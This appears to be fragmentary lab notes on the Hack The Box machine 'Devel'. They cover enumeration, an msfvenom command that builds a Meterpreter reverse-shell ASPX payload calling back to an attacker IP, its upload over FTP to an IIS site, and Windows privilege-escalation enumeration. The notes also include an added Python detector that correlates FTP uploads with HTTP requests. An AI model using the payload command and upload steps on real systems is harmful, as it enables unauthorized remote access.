The Devel (Box 1)

Enumeration:
nmap -A -T4 -p- <Machine_IP>



Wappalyzer shows the web server is IIS 7.5.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f aspx > exploit.aspx


Here we again connect to the FTP server with its credentials, then upload the exploit to the website.
put exploit.aspx
Execute the exploit:

Boom, we are in:

The steps we performed earlier gained access as a low-level user. From here we are going to escalate from our current role, IIS APPPOOL/web, to a higher-privilege user, a system-level user to be specific.
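
From the defender's side, the foothold above (a script file stored over FTP, then requested through the web server) leaves a trail that can be correlated across the FTP and HTTP logs. The following is an added example, not part of the original notes: it assumes W3C-format logs with a `#Fields` header and that the FTP root is the web root; the log lines are constructed and the function names are hypothetical.

```python
# Added example: all log lines below are constructed for illustration.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")

FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-10 09:14:02 10.10.14.4 - USER anonymous 331
2024-01-10 09:14:03 10.10.14.4 anonymous PASS - 230
2024-01-10 09:14:20 10.10.14.4 anonymous STOR /exploit.aspx 226
2024-01-10 09:15:41 192.0.2.10 anonymous STOR /notes.txt 226
2024-01-10 09:16:05 192.0.2.10 anonymous STOR /blocked.aspx 550
"""

HTTP_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-10 09:13:55 GET /welcome.png 10.10.14.4 200
2024-01-10 09:14:45 GET /exploit.aspx 10.10.14.4 200
2024-01-10 09:17:00 GET /blocked.aspx 192.0.2.10 404
"""

def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_uploaded_script_hits(ftp_text, http_text):
    """Alert on script files stored over FTP, then requested over HTTP (FTP root == web root assumed)."""
    uploads = {}  # lowercase path -> (upload timestamp, uploader IP)
    for r in parse_w3c(ftp_text):
        path = r.get("cs-uri-stem", "").lower()
        ok = r.get("sc-status", "").startswith("2")  # 226 = transfer complete
        if r.get("cs-method") == "STOR" and ok and path.endswith(SCRIPT_EXT):
            uploads[path] = (r["date"] + " " + r["time"], r["c-ip"])
    alerts = []
    for r in parse_w3c(http_text):
        path = r.get("cs-uri-stem", "").lower()
        stamp = r.get("date", "") + " " + r.get("time", "")
        if path in uploads and stamp >= uploads[path][0]:
            alerts.append({"path": path, "uploaded_by": uploads[path][1],
                           "uploaded_at": uploads[path][0],
                           "requested_by": r["c-ip"], "requested_at": stamp})
    return alerts

if __name__ == "__main__":
    for alert in find_uploaded_script_hits(FTP_LOG, HTTP_LOG):
        print(alert)
```

The failed upload (status 550) and the non-script file are ignored; only a successfully stored script that is later requested raises an alert.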
Further System Enumeration




WMIC > Windows Management Instrumentation Command-line
It's a command-line utility that provides a way to interact with and manage data and operations on a Windows system using Windows Management Instrumentation (WMI). WMIC is used to retrieve information about hardware, software, and other system aspects.

qfe > Quick Fix Engineering

wmic logicaldisk get caption, description, providername

USER BASED ENUMERATION






Network Enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano > to check all the ports
Password Hunting

Privilege Escalation - Windows · Total OSCP Guide
Windows - Privilege Escalation - Internal All The Things
AV Enumeration
This section is for Antivirus and Firewall configuration

sc is service control

It lists all the services running on Windows. XD
To check whether the firewall is running or not


netsh firewall show config > Displays the config of the firewall
Everything before this point was about learning how to perform things manually!
Automated Tool Overview

All the tools are for Windows


These are all the vulnerabilities which we got via Metasploit.
Escalation Path: Kernel Exploits
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits, a collection of Windows platform privilege escalation vulnerabilities

Windows Kernel Architecture
